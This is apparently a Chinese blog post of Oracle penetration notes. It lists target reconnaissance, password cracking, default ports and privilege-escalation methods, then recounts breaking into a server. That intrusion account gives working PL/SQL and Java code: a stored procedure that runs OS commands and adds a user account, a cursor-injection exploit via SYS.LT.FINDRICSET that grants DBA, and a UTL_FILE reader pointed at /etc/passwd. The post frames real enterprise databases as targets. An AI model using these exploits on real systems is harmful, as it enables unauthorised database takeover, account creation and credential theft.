###author:hiphop###
###qq:70381908###
為什麼要關注 Oracle ?
因為Oracle 被大量企業所使用,有許多目标可以選擇來滲透
許多企業都沒有更新且有潛在的方險!
提權非常簡單,容易拿到shell!!
讀了blackhat paper 讓我開始來研究Oracle
因為他隻講到一小部份 真正安全問題還有很廣的
隻是國内好像很少挖掘
因為遇到的環境不多
但是阿 Oracle 是 free download 呵呵
付費才可以upgrade
一般連接配接 Oracle 需要以下幾個條件:
IP
PORT
SID
username/password
The Oracle listener default port is 1521
generally in the 1521-1540 range
掃描刺探不會跟你說用什麼版本但新版的nmap 可以取得到一些,使用TNS packet可以解決這個問題
TNS packet 可以了解 oracle 版本
SID 刺探方式:
1.TNS listener directly
2.brute force for default sid
3.query other component 可能包含有SID
u/p 破解
提權方法:
提權 1 java function
Win32Exec
提權2 smbrelay
Run OS commands via sql injection in web applications
Run OS commands via create table
Run OS commands via dbms scheduler
Run OS commands via PL/SQL and Extproc
Run OS commands via Java
Run OS commands via Oracle Text
Run OS commands via PL/SQL Native (9i)
Run OS commands via PL/SQL Native (10g / 11g)
Run OS commands via alter system set events
還會陸續增加!!
此文隻是我的research 的小筆記
另外介紹一款工具 可以做到部份唷 py寫的
注:
Oracle default port list
Oracle HTTP Server listen port / Oracle HTTP Server port
80
Oracle Application Server
Edit httpd.conf and restart OHS
Oracle Internet Directory(non-SSL)
389
Oracle HTTP Server SSL port
443
Oracle Internet Directory(SSL)
636
Oracle Net Listener / Enterprise Manager Repository port
1521
Oracle Application Server / Oracle Database
Edit listener.ora and restart listener
Oracle Net Listener
1526
Oracle Database
Oracle Names
1575
Edit names.ora and restart names server
Oracle Connection Manager (CMAN)
1630
Oracle Connection Manager
Edit cman.ora and restart Connection Manager
Oracle JDBC for Rdb Thin Server
1701
Oracle Rdb
Oracle Intelligent Agent
1748
snmp_rw.ora
1754
1808
1809
Enterprise Manager Servlet port SSL
1810
Oracle Enterprise Manager
Oracle Connection Manager Admin (CMAN)
1830
Enterprise ManagerAgent port
1831
Enterprise Manager RMI port
1850
Oracle XMLDB FTP Port
2100
change dbms_xdb.cfg_update
Oracle GIOP IIOP
2481
Edit listener.ora/init.ora and restart listener/database
Oracle GIOP IIOP for SSL
2482
Oracle OC4J RMI
3201
Oracle OC4J AJP
3301
Enterprise Manager Reporting port
3339
Edit oem_webstage/oem.conf and restart OHS
Oracle OC4J IIOP
3401
Oracle OC4J IIOPS1
3501
Oracle OC4J IIOPS2
3601
Oracle OC4J JMS
3701
Oracle9iAS Web Cache Admin port
4000
Webcache Admin GUI or webcache.xml
Oracle9iAS Web Cache Invalidation port
4001
Oracle9iAS Web Cache Statistics port
4002
4031
4032
OracleAS Certificate Authority (OCA) - Server Authentication
4400
OracleAS Certificate Authority (OCA) - Mutual Authentication
4401
Oracle HTTP Server SSL port
4443
Oracle9iAS Web Cache HTTP Listen(SSL) port
4444
Oracle TimesTen
4662
4758
4759
4761
4764
4766
4767
Oracle Enterprise Manager Web Console
5500
Oracle Enterprise Manager Web
iSQLPlus 10g
5560
Oracle i*SQLPlus
5580
Oracle i*SQLPlus RMI Port
Oracle Notification Service request port
6003
Oracle Notification Service local port
6100
Oracle Notification Service remote port
6200
Oracle9iAS Clickstream Collector Agent
6668
Java Object Cache port
7000
DCM Java Object Cache port
7100
Oracle HTTP Server Diagnostic Port
7200
Oracle HTTP Server Port Tunneling
7501
7777
Oracle9iAS Web Cache HTTP Listen(non-SSL) port
7779
Oracle HTTP Server Jserv port
8007
OC4J Forms / Reports Instance
8888
Oracle Developer Suite
8889
Oracle Forms Server 6 / 6i
9000
Oracle SOAP Server
9998
OS Agent
14000
Oracle Times Ten
15000
15002
15004
Log Loader
44000
這是兩年前的一篇筆記。内容有删減。
先是通過某個邪惡的方法連接配接了oracle伺服器......(過程略)
很快便連接配接上oracle伺服器,此時發現:
1.連接配接後不是dba權限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升權限
3.運作SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 後發現oracle伺服器不能連接配接網絡。
幸運的是,
運作
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;
成功!這個使用者具有create proceduce權限。
此時馬上想到建立java擴充執行指令:
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"/n";myReader.close();return str;} catch (Exception e){return e.toString();}}}
begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );end;
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String'
select * from all_objects where object_name like '%LINX%'
grant all on LinxRunCMD to public
select LinxRunCMD('cmd /c net user linx /add') from dual
但是在第一步就卡住了,伺服器由于某種未知原因 不能建立java擴充!!
還好,我們還有UTL庫可以利用:
create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf varchar2(4000);
output varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
loop
begin
utl_file.get_line(fHandler,buf);
DBMS_OUTPUT.PUT_LINE('Cursor: '||buf);
exception
when no_data_found then exit;
end;
output := output||buf||chr(10);
end loop;
UTL_FILE.FCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
指定目錄。但運作後發現沒有權限。隻好想辦法提權。
***************遊标注射***************
老外寫了N個pdf介紹這技術,我精簡了代碼:
DECLARE
MYC NUMBER;
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
BEGIN SYS.LT.FINDRICSET('.''||dbms_sql.execute( '||MYC||' )||'''')--','x'); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
運作後重新連接配接就有dba權限了,簡單吧......
現在可以讀取檔案了:
select LinxUTLReadfile('passwd') from dual
後面就簡單了,不寫了。
![使用 ctypes 進行 Python 和 C 的混合程式設計[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)